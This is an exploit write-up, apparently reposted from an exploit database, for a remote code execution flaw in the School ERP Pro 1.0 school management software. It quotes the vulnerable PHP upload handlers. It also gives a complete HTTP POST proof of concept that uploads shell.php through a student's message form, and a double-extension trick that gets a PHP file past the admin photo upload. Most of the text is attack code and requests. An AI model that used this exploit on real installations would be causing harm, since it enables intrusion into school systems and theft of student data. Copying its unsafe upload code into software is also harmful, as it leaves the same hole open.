Exploit for School ERP Pro 1.0 Remote Code Execution

Name: Exploit for School ERP Pro 1.0 Remote Code Execution
Rating: 5 (59 reviews)
2020-04-29 | CVSS 0.5
## https://sploitus.com/exploit?id=PACKETSTORM:157473
# Exploit Title: School ERP Pro 1.0 - Remote Code Execution  
# Date: 2020-04-28  
# Author: Besim ALTINOK  
# Vendor Homepage: http://arox.in  
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/  
# Version: latest version  
# Tested on: Xampp  
# Credit: İsmail BOZKURT  
  
Description  
-------------------------------------------  
A student can send a message to the admin. Additionally, with this method,  
the student can upload a PHP file to the system and run code in the system.  
  
------------------------------------  
*Vulnerable code - 1: (for student area) - sendmail.inc.php*  
- Student user can send message to admin with the attachment  
------------------------------------  
$image_file = basename($_FILES['newimage']['name'][$i]);  
$ext=explode(".",$_FILES['newimage']['name'][$i]);  
$str=date("mdY_hms");  
//$t=rand(1, 15);  
$new_thumbname = "$ext[0]".$str.$t.".".$ext[1];  
$updir = "images/messagedoc/";  
$dest_path = $updir.$new_thumbname;  
$up_images[$i] = $dest_path;  
$srcfile = $_FILES['newimage']['tmp_name'][$i];  
@move_uploaded_file($srcfile, $dest_path);  
$ins_arr_prod_images = array(  
'`es_messagesid`' => $id,  
'`message_doc`' => $new_thumbname  
);  
$idss=$db->insert("es_message_documents",$ins_arr_prod_images);  
  
---------------------------------------------------  
*PoC of the Remote Code Execution*  
---------------------------------------------------  
  
POST /erp/student_staff/index.php?pid=27&action=mailtoadmin HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 ***************************  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer:  
http://localhost/erp/student_staff/index.php?pid=27&action=mailtoadmin  
Content-Type: multipart/form-data;  
boundary=---------------------------2104557667975595321153031663  
Content-Length: 718  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=8a7cca1efcb3ff66502ed010172d497a; expandable=5c  
Upgrade-Insecure-Requests: 1  
  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="subject"  
  
DEDED  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="message"  
  
<p>DEDED</p>  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="newimage[]"; filename="shell.php"  
Content-Type: text/php  
  
<?php phpinfo(); ?>  
  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="filecount[]"  
  
1  
-----------------------------2104557667975595321153031663  
Content-Disposition: form-data; name="submit_staff"  
  
Send  
-----------------------------2104557667975595321153031663--  
  
  
------------------------------------  
*Vulnerable code - 2: (for admin area) - pre-editstudent.inc.php*  
- Admin user can update user profile photo  
------------------------------------  
if (is_uploaded_file($_FILES['pre_image']['tmp_name'])) {  
$ext = explode(".",$_FILES['pre_image']['name']);  
$str = date("mdY_hms");  
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];  
$updir = "images/student_photos/";  
$uppath = $updir.$new_thumbname;  
move_uploaded_file($_FILES['pre_image']['tmp_name'],$uppath);  
$file = $new_thumbname;  
  
------------------------------------  
Bypass Technique:  
------------------------------------  
  
$_FILES['pre_image']['name']; --- > shell.php.png  
$ext = explode(".",$_FILES['pre_image']['name']);  
---  
$new_thumbname = "st_".$str."_".$ext[0].".".$ext[1];  
$ext[0] --> shell  
$ext[1] --> php  
lastfilename --> st_date_shell.php